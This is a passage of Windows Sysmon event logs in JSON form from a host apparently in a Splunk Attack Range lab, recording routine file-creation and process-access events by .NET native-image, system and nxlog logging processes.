(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:51.107\r\nProcessGuid: {E2A3D6B1-1355-5F25-0000-00109C400E00}\r\nProcessId: 2716\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a9c-0\\System.Data.Entity.dll\r\nCreationUtcTime: 2020-08-01 07:01:51.107","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:51.107","ProcessGuid":"{E2A3D6B1-1355-5F25-0000-00109C400E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a9c-0\\System.Data.Entity.dll","CreationUtcTime":"2020-08-01 07:01:51.107","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.341\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.341","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.341\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.341","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.341\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.341","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.591\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001016010C00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.591","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001016010C00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.591\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001016010C00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.591","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001016010C00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.607\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-0010A84C0E00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.607","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-0010A84C0E00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:51.763\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:51.763","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
